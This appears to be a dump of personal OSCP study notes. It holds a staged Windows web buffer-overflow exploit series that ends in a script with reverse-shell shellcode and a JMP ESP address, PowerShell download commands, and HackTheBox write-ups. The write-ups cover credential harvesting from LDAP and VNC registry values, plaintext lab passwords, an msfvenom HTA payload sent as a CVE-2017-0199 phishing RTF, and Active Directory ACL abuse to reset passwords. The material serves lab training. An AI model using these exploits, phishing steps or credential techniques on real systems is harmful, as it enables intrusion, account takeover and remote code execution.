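        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://" + HOST + "/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
        "",
        "",
    ]
    return "\r\n".join(headers).encode("ascii") + content


def send_request(request):
    """Deliver ``request`` on a fresh connection and always close it.

    Raises socket.error (OSError on Python 3) if the target is unreachable.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((HOST, PORT))
        s.sendall(request)  # send() may transmit only part of a large request
    finally:
        s.close()


# `padding` replaces the original name `filter`, which shadowed a builtin.
padding = b"A" * 780
eip = b"B" * 4          # expect EIP == 0x42424242 if 780 is the right offset
buffer_end = b"C" * 16  # marker bytes following the return address
input_buffer = padding + eip + buffer_end

print("\nSending evil buffer ")
try:
    send_request(build_request(input_buffer))
except socket.error as exc:
    print("Could not connect!")
    print("[-] %s" % exc)
    sys.exit(1)
print("\nDone!")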
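
--------------------------------------------------------------------------------
/scripts/wbof/2findeip.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Windows web BOF lab, step 2a: send a cyclic (Metasploit pattern_create
# style) pattern instead of "A"s; the 4 bytes that end up in EIP identify the
# exact offset of the return address (pattern_offset -> 780 in this lab).
import socket
import time
import sys

HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.10"
PORT = 80


def build_request(input_buffer):
    """Wrap ``input_buffer`` (bytes) in the login POST the target parses.

    The overflow is in the ``username`` field; Content-Length is computed
    from the actual body. Returns the full HTTP/1.1 request as bytes.
    """
    content = b"username=" + input_buffer + b"&password=A"
    headers = [
        "POST /login HTTP/1.1",
        "Host: " + HOST,
        # the original spelled this "User - Agent: Mozilla / 5.0 ..."; spaces
        # inside a header name are not valid HTTP
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://" + HOST + "/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
        "",
        "",
    ]
    return "\r\n".join(headers).encode("ascii") + content


def send_request(request):
    """Deliver ``request`` on a fresh connection and always close it.

    Raises socket.error (OSError on Python 3) if the target is unreachable.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((HOST, PORT))
        s.sendall(request)  # send() may transmit only part of a large request
    finally:
        s.close()


# Kept byte-for-byte from the original. Note the literal is 801 characters:
# an 800-byte pattern ends at "...Ba5Ba", and the trailing space after it
# appears to be a stray character. It does not change the offset lookup, but
# keep it in mind when reasoning about total lengths.
pattern = (
    b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9"
    b"Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
    b"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9"
    b"Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
    b"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
    b"Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
    b"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9"
    b"Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
    b"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9"
    b"Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
    b"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9"
    b"Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
    b"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9"
    b"An0An1An2An3An4An5An6An7An8An9"
    b"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9"
    b"Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9"
    b"Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9"
    b"Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9"
    b"As0As1As2As3As4As5As6As7As8As9"
    b"At0At1At2At3At4At5At6At7At8At9"
    b"Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9"
    b"Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9"
    b"Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9"
    b"Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"
    b"Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9"
    b"Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
    b"Ba0Ba1Ba2Ba3Ba4Ba5Ba ")

print("\nSending evil buffer ")
try:
    send_request(build_request(pattern))
except socket.error as exc:
    print("Could not connect!")
    print("[-] %s" % exc)
    sys.exit(1)
print("\nDone!")
--------------------------------------------------------------------------------
/scripts/wbof/3getspace.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Windows web BOF lab, step 3: after the return address, fill a 1500-byte
# buffer with "D" marker bytes and check in the debugger how many of them
# survive in memory -- that is the "space" available for the payload.
import socket
import time
import sys

HOST = sys.argv[1] if len(sys.argv) > 1 else "192.168.196.10"
PORT = 80


def build_request(input_buffer):
    """Wrap ``input_buffer`` (bytes) in the login POST the target parses.

    The overflow is in the ``username`` field; Content-Length is computed
    from the actual body. Returns the full HTTP/1.1 request as bytes.
    """
    content = b"username=" + input_buffer + b"&password=A"
    headers = [
        "POST /login HTTP/1.1",
        "Host: " + HOST,
        # the original spelled this "User - Agent: Mozilla / 5.0 ..."; spaces
        # inside a header name are not valid HTTP
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://" + HOST + "/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
        "",
        "",
    ]
    return "\r\n".join(headers).encode("ascii") + content


def send_request(request):
    """Deliver ``request`` on a fresh connection and always close it.

    Raises socket.error (OSError on Python 3) if the target is unreachable.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    try:
        s.connect((HOST, PORT))
        s.sendall(request)  # send() may transmit only part of a large request
    finally:
        s.close()


TOTAL = 1500  # overall size of the overflow body being measured

padding = b"A" * 780  # offset to the return address (2findeip.py)
eip = b"B" * 4
offset = b"C" * 4     # 4 bytes between the return address and the payload area
# 712 bytes of "D": whatever fraction of these is intact after the crash is
# the room available for shellcode.
buffer_end = b"D" * (TOTAL - len(padding) - len(eip) - len(offset))
input_buffer = padding + eip + offset + buffer_end

print("\nSending evil buffer ")
try:
    send_request(build_request(input_buffer))
except socket.error as exc:
    print("Could not connect!")
    print("[-] %s" % exc)
    sys.exit(1)
print("\nDone!")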
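#!/usr/bin/python
import socket
import time
import sys

# Vulnerable login handler targeted by every script in scripts/wbof.
TARGET_HOST = "192.168.196.10"
TARGET_PORT = 80

# Same layout as 3getspace.py / 5jmpesp.py: 780 filler bytes before the 4 bytes
# that land in EIP, then 4 bytes of slack before the data we want to look at.
PADDING_LEN = 780

# Bytes already known to be mangled by the target.  \x00 is excluded up front
# (assumed string terminator).  Workflow: run, compare the bytes after the
# "CCCC" marker in the debugger with BADCHARS, append the FIRST corrupted byte
# to KNOWN_BAD (one at a time -- one bad byte can garble everything after it),
# re-run until the whole sequence arrives intact, then pass the same list to
# msfvenom -b when generating the shellcode for 7getshell.py.
KNOWN_BAD = b"\x00"

# Every byte value 0x00-0xff except those in KNOWN_BAD, in ascending order.
# Built instead of typed out so removing a byte cannot leave a typo in the probe.
BADCHARS = bytes(bytearray(v for v in range(256) if v not in bytearray(KNOWN_BAD)))


def build_payload():
    """Return the bytes placed in the `username` field.

    Layout: PADDING_LEN filler bytes, 4 bytes that overwrite EIP, 4 bytes of
    slack, then the bad-character probe.  The original script still referenced
    the commented-out `buffer_end` here, so every run raised NameError, which
    the bare `except:` then reported as "Could not connect!".
    """
    filler = b"A" * PADDING_LEN
    eip = b"B" * 4
    slack = b"C" * 4
    return filler + eip + slack + BADCHARS


def build_request(payload):
    """Wrap `payload` in the POST /login request and return the request as bytes.

    The headers are kept byte-for-byte as in the other wbof scripts (including
    the malformed "User - Agent" header name) so this is exactly the request the
    EIP offset was measured with.
    """
    content = b"username=" + payload + b"&password=A"
    header_lines = [
        "POST /login HTTP/1.1",
        "Host: 192.168.196.10",
        "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://192.168.196.10/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
    ]
    head = "\r\n".join(header_lines) + "\r\n\r\n"
    return head.encode("latin-1") + content


def send_request(request, host=TARGET_HOST, port=TARGET_PORT, timeout=10):
    """Connect, send the whole request and always close the socket.

    Returns True on success.  On failure the real exception is printed next to
    the old "Could not connect!" text, so a crashed service, a typo in the
    payload code and an unreachable host are no longer indistinguishable.
    The timeout stops the script hanging when the target has already died.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        # sendall: send() may write only part of a ~1.5 KB request.
        sock.sendall(request)
    except socket.error as exc:
        sys.stdout.write("Could not connect! (%s)\n" % exc)
        return False
    finally:
        sock.close()
    return True


def main():
    """Send the bad-character probe; exit status 1 if the send failed."""
    sys.stdout.write("\nSending evil buffer \n")
    request = build_request(build_payload())
    if not send_request(request):
        return 1
    sys.stdout.write("\nDone!\n")
    return 0


if __name__ == "__main__":
    sys.exit(main())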
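#!/usr/bin/python
import socket
import time
import sys

# Vulnerable login handler targeted by every script in scripts/wbof.
TARGET_HOST = "192.168.196.10"
TARGET_PORT = 80

# Same layout as 5jmpesp.py: 780 filler bytes, then the 4 bytes that land in EIP.
PADDING_LEN = 780

# Little-endian 0x10090c83, the same value 5jmpesp.py puts into EIP --
# presumably a JMP ESP found earlier; confirm it lives in a module that is not
# rebased/ASLR'd before reusing it against another build of the target.
EIP = b"\x83\x0c\x09\x10"

# Short NOP sled so a slightly-off ESP still lands inside the shellcode.
NOPS = b"\x90" * 10

# Opaque 351-byte blob, presumably msfvenom output encoded with the bad
# characters found by 4checkbad.py.  It connects back to whatever LHOST/LPORT
# it was generated with, which cannot be read off here: regenerate it with the
# correct listener and the same -b list instead of editing bytes by hand.
SHELLCODE = (
    b"\xda\xd0\xbb\x32\xae\xb0\x1b\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
    b"\x52\x31\x5a\x17\x03\x5a\x17\x83\xf0\xaa\x52\xee\x08\x5a\x10"
    b"\x11\xf0\x9b\x75\x9b\x15\xaa\xb5\xff\x5e\x9d\x05\x8b\x32\x12"
    b"\xed\xd9\xa6\xa1\x83\xf5\xc9\x02\x29\x20\xe4\x93\x02\x10\x67"
    b"\x10\x59\x45\x47\x29\x92\x98\x86\x6e\xcf\x51\xda\x27\x9b\xc4"
    b"\xca\x4c\xd1\xd4\x61\x1e\xf7\x5c\x96\xd7\xf6\x4d\x09\x63\xa1"
    b"\x4d\xa8\xa0\xd9\xc7\xb2\xa5\xe4\x9e\x49\x1d\x92\x20\x9b\x6f"
    b"\x5b\x8e\xe2\x5f\xae\xce\x23\x67\x51\xa5\x5d\x9b\xec\xbe\x9a"
    b"\xe1\x2a\x4a\x38\x41\xb8\xec\xe4\x73\x6d\x6a\x6f\x7f\xda\xf8"
    b"\x37\x9c\xdd\x2d\x4c\x98\x56\xd0\x82\x28\x2c\xf7\x06\x70\xf6"
    b"\x96\x1f\xdc\x59\xa6\x7f\xbf\x06\x02\xf4\x52\x52\x3f\x57\x3b"
    b"\x97\x72\x67\xbb\xbf\x05\x14\x89\x60\xbe\xb2\xa1\xe9\x18\x45"
    b"\xc5\xc3\xdd\xd9\x38\xec\x1d\xf0\xfe\xb8\x4d\x6a\xd6\xc0\x05"
    b"\x6a\xd7\x14\x89\x3a\x77\xc7\x6a\xea\x37\xb7\x02\xe0\xb7\xe8"
    b"\x33\x0b\x12\x81\xde\xf6\xf5\x6e\xb6\x8f\xc1\x07\xc5\x6f\xdb"
    b"\x8b\x40\x89\xb1\x23\x05\x02\x2e\xdd\x0c\xd8\xcf\x22\x9b\xa5"
    b"\xd0\xa9\x28\x5a\x9e\x59\x44\x48\x77\xaa\x13\x32\xde\xb5\x89"
    b"\x5a\xbc\x24\x56\x9a\xcb\x54\xc1\xcd\x9c\xab\x18\x9b\x30\x95"
    b"\xb2\xb9\xc8\x43\xfc\x79\x17\xb0\x03\x80\xda\x8c\x27\x92\x22"
    b"\x0c\x6c\xc6\xfa\x5b\x3a\xb0\xbc\x35\x8c\x6a\x17\xe9\x46\xfa"
    b"\xee\xc1\x58\x7c\xef\x0f\x2f\x60\x5e\xe6\x76\x9f\x6f\x6e\x7f"
    b"\xd8\x8d\x0e\x80\x33\x16\x3e\xcb\x19\x3f\xd7\x92\xc8\x7d\xba"
    b"\x24\x27\x41\xc3\xa6\xcd\x3a\x30\xb6\xa4\x3f\x7c\x70\x55\x32"
    b"\xed\x15\x59\xe1\x0e\x3c"
)


def build_payload():
    """Return the bytes placed in the `username` field.

    Layout: PADDING_LEN filler bytes, EIP (the JMP ESP address), 4 bytes of
    slack, the NOP sled, then SHELLCODE.  Unlike 5jmpesp.py nothing is padded
    to 1500 bytes: the request ends with the shellcode.
    """
    filler = b"A" * PADDING_LEN
    slack = b"C" * 4
    return filler + EIP + slack + NOPS + SHELLCODE


def build_request(payload):
    """Wrap `payload` in the POST /login request and return the request as bytes.

    The headers are kept byte-for-byte as in the other wbof scripts (including
    the malformed "User - Agent" header name) so this is exactly the request the
    EIP offset was measured with.
    """
    content = b"username=" + payload + b"&password=A"
    header_lines = [
        "POST /login HTTP/1.1",
        "Host: 192.168.196.10",
        "User - Agent: Mozilla / 5.0 (X11; Linux_86_64; rv: 52.0) Gecko / 20100101Firefox / 52.0",
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language: en-US,en;q=0.5",
        "Referer: http://192.168.196.10/login",
        "Connection: close",
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: " + str(len(content)),
    ]
    head = "\r\n".join(header_lines) + "\r\n\r\n"
    return head.encode("latin-1") + content


def send_request(request, host=TARGET_HOST, port=TARGET_PORT, timeout=10):
    """Connect, send the whole request and always close the socket.

    Returns True on success.  The real exception is printed next to the old
    "Could not connect!" text so a dead service and a bug in the payload code
    can be told apart; the timeout stops the script hanging on a crashed target.
    Note that "Done!" only means the bytes were sent -- the listener
    (nc -lvnp on the LHOST the shellcode was built for) shows whether it worked.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        # sendall: send() may write only part of the request.
        sock.sendall(request)
    except socket.error as exc:
        sys.stdout.write("Could not connect! (%s)\n" % exc)
        return False
    finally:
        sock.close()
    return True


def main():
    """Send the exploit request; exit status 1 if the send failed."""
    sys.stdout.write("\nSending evil buffer \n")
    request = build_request(build_payload())
    if not send_request(request):
        return 1
    sys.stdout.write("\nDone!\n")
    return 0


if __name__ == "__main__":
    sys.exit(main())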
56 | -------------------------------------------------------------------------------- /scripts/wbof/Asxtomp3converter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/19oos/My-oscp-notes/5e1e73735814f5ca792ddbe6adb7ef05d13c3409/scripts/wbof/Asxtomp3converter.exe -------------------------------------------------------------------------------- /scripts/wbof/asxbof.md: -------------------------------------------------------------------------------- 1 | 2 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.3.214/asx2mp3.m3u', 'C:\Users\Derek\Desktop\asx2mp3.m3u')" 3 | 4 | powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.3.214/Asxtomp3converter.exe', 'C:\Users\Derek\Desktop\Asxtomp3converter.exe')" 5 | -------------------------------------------------------------------------------- /writeup/htb/ad-acute.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129.136.40 8 | 9 | hostname: Acute 10 | 11 | Difficulty: Hard 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + powershell invoke-command 18 | + powershell pscredential 19 | + 20 | 21 | 22 | 23 | 24 | 25 | **attack note** 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | # Enum 34 | 35 | ## nmap scan 36 | 37 | 38 | 39 | ```bash 40 | nmap -p- --min-rate=1000 -T4 -oN nmap.light $tip 41 | export port=$(cat nmap.light | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//) 42 | sudo nmap -A -O -p$port -sC -sV -T4 -oN nmap.heavy $tip 43 | 44 | 45 | ``` 46 | 47 | 48 | 49 | 50 | 51 |  52 | 53 | 54 | 55 | 56 | 57 |  58 | 59 | 60 | 61 |  62 | 63 | 64 | 65 |  66 | 67 | 68 | 69 | # Foothold 70 | 71 | 72 | 73 | 74 | 75 | # Privesc 76 | 77 | 78 | 79 | 80 | 81 | ## proof 82 | 83 | ```bash 84 | 85 | 86 | ``` 87 | 88 | 89 | 90 | -------------------------------------------------------------------------------- 
/writeup/htb/ad-cascade.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129.236.97 8 | 9 | hostname: Cascade 10 | 11 | Difficulty: Medium 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + ldapsearch with an anonymous (null) bind, then grep the dump for pass/pwd/cred/password; Cascade leaks a base64-encoded password for r.thompson this way 18 | + Decode/decrypt offline (CyberChef or similar): base64 for the LDAP value, and the VNC registry password, which is DES-encrypted under a fixed, publicly known key 19 | + Membership of the AD Recycle Bin group lets you read deleted AD objects (Get-ADObject -IncludeDeletedObjects); the deleted TempAdmin object is the one worth dumping with -Property * 20 | + The SMB NETLOGON share may contain logon scripts (.vbs) with hard-coded credentials. 21 | 22 | 23 | 24 | 25 | 26 | **attack note** 27 | 28 | ```bash 29 | Cascade / 10.129.236.97 30 | 31 | PORT STATE SERVICE VERSION 32 | 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 33 | | dns-nsid: 34 | |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 35 | 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-21 15:36:09Z) 36 | 135/tcp open msrpc Microsoft Windows RPC 37 | 139/tcp open netbios-ssn? 38 | 389/tcp filtered ldap 39 | 445/tcp open microsoft-ds? 
40 | 636/tcp open tcpwrapped 41 | 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 42 | 3269/tcp open tcpwrapped 43 | 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 44 | |_http-server-header: Microsoft-HTTPAPI/2.0 45 | |_http-title: Not Found 46 | 49154/tcp open unknown 47 | 49155/tcp open msrpc Microsoft Windows RPC 48 | 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49 | 49158/tcp open msrpc Microsoft Windows RPC 50 | 49173/tcp open msrpc Microsoft Windows RPC 51 | 52 | ---- Interesting 53 | -- from nmap heavy scan 54 | 3268:Domain: cascade.local 55 | 53:Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 56 | 57 | -- from crackmapexec pass-pol 58 | Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) 59 | 60 | -- domain users and sid from enum4linux 61 | domainuser.list 62 | Domain Name: CASCADE 63 | Domain Sid: S-1-5-21-3332504370-1206983947-1165150453 64 | 65 | -- password from the anonymous LDAP bind (user : base64 value as stored : decoded) 66 | r.thompson:clk0bjVldmE=:rY4n5eva 67 | 68 | -- smb data, VNC install.reg: the "Password" value is the VNC password DES-encrypted with VNC's fixed, well-known key, so it decrypts offline (CyberChef); result is s.smith's password 69 | "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f 70 | s.smith:sT333ve2 71 | 72 | 73 | 74 | ---- Enum 75 | -- dns, nothing 76 | dig any @$tip cascade.local 77 | dig axfr @$tip cascade.local 78 | 79 | -- rpc 80 | nothing new, same as enum4linux. 81 | 82 | -- smb 83 | no shares (anonymous / guest attempts below all failed). 
84 | smbclient -L $tip -U null 85 | smbclient -L $tip -U null -N 86 | smbclient -L $tip -U "" 87 | smbclient -L $tip -U cascguest 88 | smbclient -L $tip -U cascguest -N 89 | smbclient -L $tip -U cascguest -P '' 90 | smbclient -L $tip -U cascguest -N 91 | smbmap -H $tip -u cascguest 92 | smbmap -H $tip -u cascguest -p '' 93 | 94 | -- ldap 95 | 96 | cat ldap-anonymous.log | grep -i pwd 97 | 98 | crackmapexec smb $tip -u r.thompson -p 'rY4n5eva' --shares 99 | 100 | -- ad 101 | # asrepoast 102 | GetNPUsers.py -usersfile domainuser.list -no-pass -dc-ip $tip cascade.local/ -format hashcat -outputfile asreproast.hash 103 | 104 | 105 | -- enum r.thompson 106 | cyberchef, convert 107 | echo '6bcf2a4b6e5aca0f' | xxd -r -p > smith.vncpwd 108 | 109 | 110 | crackmapexec smb $tip -u s.smith -p 'sT333ve2' --shares 111 | 112 | crackmapexec winrm $tip -u s.smith -p 'sT333ve2' 113 | 114 | ---- Foothold 115 | 116 | -- s.smith 117 | 118 | smbclient //$tip/Audit$ -U s.smith%sT333ve2 119 | 120 | evil-winrm -u s.smith -p 'sT333ve2' -i $tip 121 | 122 | ---- System 123 | # query deleted ad object 124 | Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects 125 | 126 | # query deleted ad object, tempadmin 127 | Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property * 128 | 129 | evil-winrm -u administrator -p 'baCT3r1aN00dles' -i $tip 130 | ``` 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | # Enum 139 | 140 | ## nmap scan 141 | 142 | 143 | 144 | ```bash 145 | nmap -p- --min-rate=1000 -T4 -oN nmap.light $tip 146 | export port=$(cat nmap.light | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//) 147 | sudo nmap -A -O -p$port -sC -sV -T4 -oN nmap.heavy $tip 148 | 149 | 150 | ``` 151 | 152 | 153 | 154 | 155 | 156 |  157 | 158 | 159 | 160 | 161 | 162 |  163 | 164 | 165 | 166 |  167 | 168 | 169 | 170 | # Foothold 171 | 172 | 173 | 174 | 175 | 176 | # Privesc 177 | 178 | 179 | 180 | 181 | 182 | ## proof 183 | 184 
| ```bash 185 | 186 | 187 | ``` 188 | 189 | 190 | -------------------------------------------------------------------------------- /writeup/htb/ad-reel.md: -------------------------------------------------------------------------------- 1 | # Summary 2 | 3 | 4 | 5 | ## about target 6 | 7 | tip: 10.129. 8 | 9 | hostname: Reel 10 | 11 | Difficulty: Hard 12 | 13 | 14 | 15 | ## about attack 16 | 17 | + HTA phishing: generate the HTA with msfvenom (-f hta-psh) or Out-HTA.ps1, wrap it in a CVE-2017-0199 RTF and mail it to the user 18 | + WriteOwner on a user: take ownership (Set-DomainObjectOwner), grant yourself ResetPassword (Add-DomainObjectAcl), then set a new password (Set-DomainUserPassword) 19 | + WriteDacl on a group: grant yourself rights on the group, then add your user to it 20 | + BloodHound: check "First Degree Object Control" for each user you own 21 | + A PSCredential saved with Export-CliXml is DPAPI-protected for that user on that host, so the same account can Import-CliXml it and read the cleartext with GetNetworkCredential(). 22 | 23 | 24 | 25 | 26 | 27 | **attack note** 28 | 29 | ```bash 30 | Reel / 10.129.228.124 31 | 32 | 33 | ---- Interesting 34 | 35 | htb\tom:1ts-mag1c!!! 36 | administrator:Cr4ckMeIfYouC4n! 37 | ---- Enum 38 | # ftp enum, anonymous login; found files. 39 | ftp $tip 40 | 41 | exiftool Windows\ Event\ Forwarding.docx 42 | 43 | # smtp enum 44 | ## nmap sc scan, found users. 45 | nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $tip -oN smtp.nmap 46 | 47 | ## enum user, recheck. 48 | smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t $tip 49 | 50 | smtp-user-enum -M RCPT -U users.txt -t $tip 51 | 52 | ---- Foothold 53 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=$kip LPORT=443 -f hta-psh -o msfv.hta 54 | 55 | python2 cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.90/msfv.hta -t rtf -x 0 56 | 57 | sendEmail -f hack01@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s $tip -v 58 | 59 | 60 | powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *" 61 | 62 | Get-ObjectAcl -SamAccountName claire -ResolveGUIDs | ? 
{$_.ActiveDirectoryRights -eq "GenericAll"} 63 | 64 | ---- System 65 | Set-DomainObjectOwner -identity claire -OwnerIdentity tom 66 | 67 | Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword 68 | 69 | $cred = ConvertTo-SecureString "Hack01@123" -AsPlainText -force 70 | Set-DomainUserPassword -identity claire -accountpassword $cred 71 | ``` 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | # Enum 80 | 81 | ## nmap scan 82 | 83 | 84 | 85 | ```bash 86 | nmap -p- --min-rate=1000 -T4 -oN nmap.light $tip 87 | export port=$(cat nmap.light | grep ^[0-9] | cut -d "/" -f 1 | tr "\n" "," | sed s/,$//) 88 | sudo nmap -A -O -p$port -sC -sV -T4 -oN nmap.heavy $tip 89 | 90 | PORT STATE SERVICE VERSION 91 | 21/tcp open ftp Microsoft ftpd 92 | | ftp-syst: 93 | |_ SYST: Windows_NT 94 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 95 | |_05-28-18 11:19PM